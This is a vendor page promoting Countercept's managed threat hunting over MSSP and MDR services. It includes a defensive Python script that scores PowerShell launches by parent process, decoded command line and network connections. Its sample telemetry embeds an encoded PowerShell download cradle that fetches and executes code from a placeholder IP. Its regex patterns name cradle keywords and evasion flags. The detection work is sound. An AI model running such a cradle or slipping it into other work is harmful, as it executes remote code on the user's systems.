Managed Threat Hunting
No matter how good your technology, it’s worthless without the right people to utilize it: individuals with the right skills and the right experience, keenly engaged in their role.
HUNTING IS A MINDSET, NOT JUST NEW TECHNOLOGY
MSSPs vs MANAGED THREAT HUNTING
The traditional approach to detection, as adopted by Managed Security Service Providers (MSSPs), conjures up images of dynamic dashboards and flashing red lights, possibly even a shiny ‘threat map’. These gimmicks divert attention from the underlying detection principles, which are archaic: rules and alerts that fire on known signatures. Rules and alerts on their own will not reveal a targeted attack, because the modern threat actor uses tooling that matches no existing signature and then carries out post-compromise actions (credential use, lateral movement, data access) that masquerade as those of a legitimate internal user.
Rather than alerts notifying analysts of ‘known-knowns’, Countercept uses trained threat hunters and anomaly-based methods to detect previously unknown attacks.
MDR vs MANAGED THREAT HUNTING
Threat Hunting is a fresh approach that relies on the hunt team’s experience and a deep knowledge of attacker operations to continuously generate hypotheses that uncover and contain compromise on your network. Hunt sprints are conducted across data from endpoints, network, and logs to gain complete visibility across the breadth of the kill-chain.
MDR stands for Managed Detection and Response, but in practice many MDR services amount to ‘Managed EDR’: a 'light-touch', highly automated hunting capability focused solely on the endpoint. This misses attack vectors that are only visible in network and log data, and provides limited capability to deal with the threat once it has been identified.
A WORLD-LEADING HUNT TEAM
Having conducted countless Targeted Attack Simulations ourselves, Countercept’s hunt team are offensively trained, meaning that we know what to look for based on what we would do next if we were performing the attack. The team also comprises qualified incident responders who can rapidly take action to contain an attack.
The Countercept team have a deep understanding of OS internals, malware analysis and the use of both on-disk and live memory forensics to reveal attacks.
Modern tech for modern attacks
To reveal advanced attacks, a threat hunter needs tooling that covers modern attack paths. This technology is known as Endpoint Detection and Response (EDR). An effective EDR tool enables the investigation of anomalous activity in the live memory and operating systems of endpoints, from initial code execution through persistence and lateral movement to attackers ‘living off the land’ with legitimate tools such as PowerShell.
A tool that alerts a security team to every instance of PowerShell will quickly be discarded: administrators and management agents run PowerShell all day. Effective hunting comes from EDR data combined with the threat hunter's skill in cross-correlating it against other data (the parent process, the decoded command line, the network connections and authentications made by the same process) to separate an intruder's use from routine use.
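As an added illustration of the cross-correlation described above and of the endpoint-plus-network hunt data mentioned under hunt sprints (example code written for this page, not Countercept's tooling), the following Python scores each powershell.exe launch by combining its parent process, its decoded command line and the network connections made by the same process, instead of alerting on the launch itself. The events are constructed Sysmon-style records; the internal address ranges, the indicator weights and the threshold are assumptions a hunt team would tune to its own environment.

```python
"""Hunt hypothesis: PowerShell run by an intruder rather than an admin.

Added example (not Countercept's code). Process-creation events (Sysmon
Event ID 1) are joined to network-connection events (Event ID 3) on the
process GUID, and each PowerShell launch is scored on several weak
indicators. Only the combination trips the threshold, so routine
administrative PowerShell is not flagged.
"""
import base64
import ipaddress
import re
from collections import defaultdict

PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def encode_ps(script: str) -> str:
    """Build a -EncodedCommand payload: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry, not real data. Fields mirror Sysmon 1 and 3.
EVENTS = [
    {"id": 1, "guid": "p1", "host": "WS01", "user": "CORP\\jsmith", "image": PS_PATH,
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},
    {"id": 1, "guid": "p2", "host": "WS02", "user": "CORP\\adoe", "image": PS_PATH,
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')")},
    {"id": 3, "guid": "p2", "host": "WS02", "dest_ip": "203.0.113.7", "dest_port": 80},
    {"id": 1, "guid": "p3", "host": "SRV01", "user": "CORP\\svc_sccm", "image": PS_PATH,
     "parent": r"C:\Windows\CCM\CcmExec.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Windows\CCM\Scripts\patch.ps1"},
    {"id": 3, "guid": "p3", "host": "SRV01", "dest_ip": "10.0.5.20", "dest_port": 445},
]

# Assumed corporate address plan: anything outside these is "external".
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Parents that should not normally launch PowerShell (user applications).
USER_APP_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                    "msedge.exe", "chrome.exe", "firefox.exe"}
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
BYPASS_RE = re.compile(r"-ex(?:ecutionpolicy)?\s+bypass", re.I)
CRADLE_RE = re.compile(r"downloadstring|downloadfile|net\.webclient|"
                       r"invoke-expression|\biex\b|invoke-webrequest", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_process(proc: dict, connections: list):
    """Score one PowerShell launch; returns (score, list of reasons)."""
    score, reasons = 0, []
    parent = proc["parent"].rsplit("\\", 1)[-1].lower()
    if parent in USER_APP_PARENTS:
        score += 3; reasons.append(f"spawned by user application {parent}")
    cmd = proc["cmdline"]
    if HIDDEN_RE.search(cmd):
        score += 1; reasons.append("hidden window")
    if BYPASS_RE.search(cmd):
        score += 1; reasons.append("execution policy bypass")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        score += 2; reasons.append("encoded command")
    # Look for a download cradle in the decoded script, not the raw base64.
    if CRADLE_RE.search(decoded if decoded is not None else cmd):
        score += 3; reasons.append("download cradle")
    for c in connections:
        ip = ipaddress.ip_address(c["dest_ip"])
        if not any(ip in net for net in INTERNAL_NETS):
            score += 2; reasons.append(f"external connection to {c['dest_ip']}:{c['dest_port']}")
            break
    return score, reasons


def hunt(events: list, threshold: int = 4) -> list:
    """Join process and network events by GUID; return launches over threshold."""
    conns = defaultdict(list)
    for e in events:
        if e["id"] == 3:
            conns[e["guid"]].append(e)
    findings = []
    for p in events:
        if p["id"] != 1 or not p["image"].lower().endswith("powershell.exe"):
            continue
        score, reasons = score_process(p, conns.get(p["guid"], []))
        if score >= threshold:
            findings.append({"host": p["host"], "user": p["user"], "guid": p["guid"],
                             "score": score, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt(EVENTS):
        print(f"{f['host']} {f['user']} score={f['score']}: {'; '.join(f['reasons'])}")
```

Of the three launches, only the Word-spawned, hidden, encoded download cradle that then connected outside the corporate ranges is reported; the SCCM agent's execution-policy bypass scores one point on its own and stays below the threshold, which is the point of scoring context rather than alerting on PowerShell itself.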
Traditional tech for traditional attacks
As threats have developed in sophistication and capability, traditional MSSP security vendors have simply responded with ‘more of the same’: faster log analysis, more events per second, wider network coverage. None of this helps against attack techniques that match no existing rule.
Threat intelligence, rules, alerts and signatures only catch what has been seen before, leaving most companies blind to the earliest, and most crucial, stages of an attack, before any indicator exists to match against.